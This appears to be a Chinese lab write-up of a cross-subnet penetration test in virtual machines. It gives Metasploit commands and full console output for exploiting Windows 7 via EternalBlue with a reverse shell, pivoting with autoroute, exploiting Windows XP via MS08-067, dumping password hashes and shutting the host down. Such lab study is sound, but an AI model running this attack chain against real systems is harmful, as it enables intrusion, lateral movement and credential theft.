Windows网络服务渗透测试实战-跨网段攻击
2024-05-11 02:32:05
一、实验项目名称
Windows网络服务渗透测试实战-跨网段攻击
二、实验目的及要求
掌握对跨网段攻击的方法。
熟悉Metasploit终端的使用方法。
熟悉通过meterpreter进行后渗透操作
获取winxp系统管理员admin的密码,并使xp系统关机
----基础配置----
1、选择win7
2、选择winXP
3、选择kali
4、查看kali的ip
5、查看winXP的ip
6、查看win7的IP
总结如下:
|
WinXP |
Win7 |
Kali |
|
网络适配器 桥接模式(自动) 192.168.43.99 |
网络适配器 桥接模式(自动) 192.168.43.89 |
|
|
网络适配器 NAT 192.168.232.128 |
网络适配器2 NAT 192.168.232.145 |
----开始跨网段攻击----
1、输入 msfconsole 启动metasploit
2、使用“永恒之蓝”的漏洞模块,使用扫描命令进行网段内主机扫描
use auxiliary/scanner/smb/smb_ms17_010 //进入扫描模块set rhosts (目标网段) //扫描目标网段内的主机set threads 512 //设置扫描线程run //执行
3、设置攻击步骤进行攻击
use exploit/windows/smb/ms17_010_eternalblue //利用攻击模块set rhost (目标IP) //设置目标IPset lhost (监听主机IP) //设置监听IPset payload windows/x64/meterpreter/reverse_tcp //设置攻击载荷run 4、通过meterpreter终端获取系统控制台shell,执行ipconfig发现主机存在双网段
5、获取shell权限,在cmd窗口试图下输入 arp -a 可以发现,存在同网段的地址
6、返回meterpreter终端将内网网段192.168.232.128/24添加值路由表
run autoroute -s 192.168.232.128/24run autoroute -p //查看路由表状况
7.使用 background 退出到msf试图,并搜索 ms08-067 ,此处可以看到内网主机是XP系统,直接使用 ms08- 067 进行攻击
backgroup
search ms08-067use exploit/windows/smb/ms08_067_netapi //利用攻击模块set payload windows/meterpreter/bind_tcp //设置攻击载荷set rhost (目标IP) //设置监听IPrun
8、获取winxp系统管理员admin的密码
9、使xp系统关机
关机之后kali中会失去会话
┌──(kali㉿kali)-[~/Desktop]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000link/ether 00:0c:29:68:f4:d1 brd ff:ff:ff:ff:ff:ffinet 192.168.43.89/24 brd 192.168.43.255 scope global dynamic noprefixroute eth0valid_lft 2911sec preferred_lft 2911secinet6 240e:468:81:203c:da81:9549:e675:f2e0/64 scope global temporary dynamic valid_lft 3538sec preferred_lft 3538secinet6 240e:468:81:203c:20c:29ff:fe68:f4d1/64 scope global dynamic mngtmpaddr noprefixroute valid_lft 3538sec preferred_lft 3538secinet6 fe80::20c:29ff:fe68:f4d1/64 scope link noprefixroute valid_lft forever preferred_lft forever┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]Metasploit tip: Open an interactive Ruby terminal with
irbmsf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.43.99
rhosts => 192.168.43.99
msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 512
threads => 512
msf6 auxiliary(scanner/smb/smb_ms17_010) > run[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.43.99
rhost => 192.168.43.99
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.43.89
lhost => 192.168.43.89
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 192.168.43.89:4444
[*] 192.168.43.99:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.43.99:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.99:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.43.99:445 - The target is vulnerable.
[*] 192.168.43.99:445 - Connecting to target for exploitation.
[+] 192.168.43.99:445 - Connection established for exploitation.
[+] 192.168.43.99:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.43.99:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.43.99:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.43.99:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.43.99:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.43.99:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.43.99:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.43.99:445 - Sending all but last fragment of exploit packet
[*] 192.168.43.99:445 - Starting non-paged pool grooming
[+] 192.168.43.99:445 - Sending SMBv2 buffers
[+] 192.168.43.99:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.43.99:445 - Sending final SMBv2 buffers.
[*] 192.168.43.99:445 - Sending last fragment of exploit packet!
[*] 192.168.43.99:445 - Receiving response from exploit packet
[+] 192.168.43.99:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.43.99:445 - Sending egg to corrupted connection.
[*] 192.168.43.99:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.43.99
[*] Meterpreter session 1 opened (192.168.43.89:4444 -> 192.168.43.99:50762) at 2022-05-18 22:23:55 -0400
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter > shell
Process 7924 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001C:\Windows\system32>ipconfig
ipconfigWindows IP ConfigurationEthernet adapter �������� 2:Connection-specific DNS Suffix . : localdomainLink-local IPv6 Address . . . . . : fe80::e970:4199:33c6:f0f3%21IPv4 Address. . . . . . . . . . . : 192.168.232.145Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.232.2Ethernet adapter Bluetooth ��������:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . : Ethernet adapter ��������:Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : 240e:468:81:203c:6d7a:d608:7ec3:80eTemporary IPv6 Address. . . . . . : 240e:468:81:203c:b1e9:713c:1d5d:3a38Link-local IPv6 Address . . . . . : fe80::6d7a:d608:7ec3:80e%11IPv4 Address. . . . . . . . . . . : 192.168.43.99Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : fe80::284a:4a93:2ef9:661b%11192.168.43.1Tunnel adapter isatap.{D0C9B1FF-3866-45AB-BD3C-6BCCE51D708F}:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . : Tunnel adapter isatap.{AA43B9EC-6828-4E2A-ACED-837F5FF4C2C8}:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . : Tunnel adapter isatap.localdomain:Media State . . . . . . . . . . . : Media disconnectedConnection-specific DNS Suffix . : C:\Windows\system32>arp -a
arp -aInterface: 192.168.43.99 --- 0xbInternet Address Physical Address Type192.168.43.1 12-2b-33-95-ca-ca dynamic 192.168.43.89 00-0c-29-68-f4-d1 dynamic 192.168.43.107 50-e0-85-a8-bc-86 dynamic 192.168.43.162 50-e0-85-a8-bc-86 dynamic 192.168.43.170 50-e0-85-a8-bc-86 dynamic 192.168.43.223 c0-3c-59-b9-be-3c dynamic 192.168.43.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static 255.255.255.255 ff-ff-ff-ff-ff-ff static Interface: 192.168.232.145 --- 0x15Internet Address Physical Address Type192.168.232.1 00-50-56-c0-00-08 dynamic 192.168.232.2 00-50-56-fb-6f-4e dynamic 192.168.232.128 00-0c-29-52-81-07 dynamic 192.168.232.254 00-50-56-e3-a4-9f dynamic 192.168.232.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static 255.255.255.255 ff-ff-ff-ff-ff-ff static C:\Windows\system32>exit
meterpreter > run autoroute -s 192.168.232.128/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.232.128/255.255.255.0...
[+] Added route to 192.168.232.128/255.255.255.0 via 192.168.43.99
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]Active Routing Table
====================Subnet Netmask Gateway------ ------- -------192.168.232.128 255.255.255.0 Session 1meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > search ms08-067Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapimsf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.232.128
rhost => 192.168.232.128
msf6 exploit(windows/smb/ms08_067_netapi) > run[*] 192.168.232.128:445 - Automatically detecting the target...
[*] 192.168.232.128:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.232.128:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.232.128:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.232.128:4444
[*] Sending stage (175174 bytes) to 192.168.232.128
[*] Meterpreter session 2 opened (192.168.232.145:51366 -> 192.168.232.128:4444) at 2022-05-18 22:38:20 -0400meterpreter > shell
Process 7092 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>ipconfig
ipconfigWindows IP ConfigurationEthernet adapter Local Area Connection:Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.232.128Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.10.254C:\WINDOWS\system32>getuid
getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.C:\WINDOWS\system32>exit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::
meterpreter > shell
Process 8096 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>shutdown -s -t 5
shutdown -s -t 5C:\WINDOWS\system32>
[*] 192.168.232.128 - Meterpreter session 2 closed. Reason: DiedWindows网络服务渗透测试实战-跨网段攻击相关推荐
- Windows网络服务渗透测试实战MS17-010漏洞复现
一.实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二.实验目的及要求 熟悉Metasploit终端的使用方法: 掌握对MS17-010漏洞攻击的方法. 三.复现步骤(附加文 ...
- TryHackMe-Wreath [网络杀伤链](windows网络)渗透测试
Wreath 复习了几天,把自己写的辣鸡wp都看了看,ad也复了复,顺便还将之前一些不懂和遗漏的一些问题都解决了,所谓温故而知新 在继续红队路径之前,先来玩一玩期待已久的Wreath 了解如何通过破坏 ...
- 如何进行渗透测试XSS跨站攻击检测
国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲 ...
- ONE DAY |网络安全渗透测试之跨网段攻击
目录 一.网络安全 1.什么是渗透测试? 2.渗透测试的完整流程 3.渗透测试方法 二.实验阶段 1.实验项目名称 2.实验所需工具 3.实验目的及要求 作业要求: 4.实验开始 1.配置 ...
- 渗透测试——网络服务渗透攻击
网络服务渗透攻击指的是:在之前的博客中描述的内存攻击中,以远程主机运行的某个网络服务程序为目标,向该目标服务开放端口发送内嵌恶意内容并符合该网络服务协议的数据包,利用网络服务程序内部的安全漏洞,劫持目 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御
目录 前言 一.跨域攻击方法 二.利用域信任关系的跨域攻击 1.域信任简介 2.获取域信息 3.利用域信任秘钥(NTLM Hash)获取目标域的权限 4.利用krbtgt散列值获取目标域的权限 5.利 ...
- 《树莓派渗透测试实战》——2.7 设置SSH服务
本节书摘来自异步社区<树莓派渗透测试实战>一书中的第2章,第2.7节,作者[美]Joseph Muniz(约瑟夫 穆尼斯),Aamir Lakhani(阿米尔 拉克哈尼),朱筱丹 译,更多 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础
目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...
- 渗透测试实战指南笔记
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache.Nginx.MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包. 首先,下载需要的安装包 ...
最新文章
- cxgrid中纵横单元格合并_被合并单元格折磨疯的我,真后悔没早点知道这个Excel技巧!...
- CNN在Keras中的实践|机器学习你会遇到的“坑”
- linux有关Block的知识
- golang 变量定义和初始化
- [eBook] SQL 2008
- python 迭代详解_详解python中的迭代
- flask查询mysql数据展示_flask再学习-思考之怎么从数据库中查询数据在页面展示!...
- Qt工作笔记-使用hiredis连接及查询Redis
- node 升级_那些修改node_modules的骚操作
- 怎么在线制作gif动图?推荐一款gif表情包在线制作生成器
- eXtremeComponents指南
- 华为网络技术大赛笔记——存储器基础原理
- 苹果系统摩尔庄园是什么服务器,摩尔庄园手游官服和渠道服有什么区别_可以一起玩吗_官服和渠道服详细介绍...
- linux移动硬盘hd0,怎样将UbuntuLinux系统放到移动硬盘?
- uniapp-路由和navigate跳转
- 推荐一个牛逼的直播开源项目
- 信贷客户调查中最需关注的十个方面(附经典案例解析)
- 液化天然气(LNG)的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
- iis网站访问默认到html文件,mvc vs iis默认页面
- Navicat创建事件不执行的情况?